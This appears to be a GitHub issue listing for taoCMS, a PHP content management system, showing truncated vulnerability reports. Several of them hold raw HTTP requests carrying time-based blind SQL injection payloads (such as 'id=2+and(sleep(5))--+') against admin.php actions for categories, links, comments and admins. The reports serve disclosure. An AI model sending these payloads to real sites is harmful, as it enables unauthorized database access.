taocms icon indicating copy to clipboard operation
taocms copied to clipboard

taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)

Results 29 taocms issues
Sort by recently updated
recently updated
newest added

Vulnerability file address: \include\Model\Category.php ![1](https://user-images.githubusercontent.com/90141086/154260116-5f89f068-229c-4d04-81fd-7b961038dd3d.png) It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into...

This is the latest 3.0.2 version of taocms. Organize and utilize steps in two steps: **Step1:** Audit the source code E:\xxx\taocms-3.0.2\include\Model\File.php, line 96, and find that there may be arbitrary...

There is SQL blind injection at Del comment Create a comment ![image](https://user-images.githubusercontent.com/96719328/149738510-67e2ca79-9765-4c66-be15-bd2ede3070d2.png) Log on to the background ![image](https://user-images.githubusercontent.com/96719328/149738566-937cae92-6365-4b11-aa37-5686855f66ea.png) Grab packets and modify data when deleting comments ![image](https://user-images.githubusercontent.com/96719328/149738831-87133e33-f653-4626-96b6-4c5eaebbd4d1.png) ![image](https://user-images.githubusercontent.com/96719328/149738845-a2074531-27a0-460f-bd14-04ae3bbcf11b.png) taocms-3.0.2/admin/admin.php ![image](https://user-images.githubusercontent.com/96719328/149738902-866e0256-af6d-4c33-9fdb-fdf6de3e8964.png)...

``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9...

![20220116015744](https://user-images.githubusercontent.com/46486374/149633033-32c2dfd1-bc79-46a1-96c8-a05e1873985c.jpg) ![20220116015609](https://user-images.githubusercontent.com/46486374/149633040-9d78fd1a-3df2-4c0b-bc2b-71ea3aa5727e.jpg) ``` GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate...

![image](https://user-images.githubusercontent.com/46486374/149645386-6b4d5027-dccc-4a6a-a4c7-69e705a5275e.png) ``` GET /admin/admin.php?action=link&id=1)or(sleep(5))--+&ctrl=del HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...

![image](https://user-images.githubusercontent.com/46486374/149635177-a7232165-f6ff-45b9-b37f-5bf3f2e40a5e.png) ``` GET /admin/admin.php?action=Category&id=2)and(sleep(5))--+&ctrl=del HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...

![image](https://user-images.githubusercontent.com/46486374/149634913-40a99ca3-b83a-4379-81ae-322ace80a09d.png) ``` GET /admin/admin.php?action=Category&id=2+and(sleep(5))--+&ctrl=update HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...

![image](https://user-images.githubusercontent.com/46486374/149634706-7e5dcc81-0082-4bda-a0f5-a653e6d01268.png) ``` GET /admin/admin.php?action=Category&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language:...

![image](https://user-images.githubusercontent.com/46486374/149633426-23ec02c3-81c8-411f-b8f9-082af5b35823.png) ![image](https://user-images.githubusercontent.com/46486374/149633374-e8970dc0-14ca-4248-8188-0a39e7c1e3a1.png) ``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://taocms.test Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83...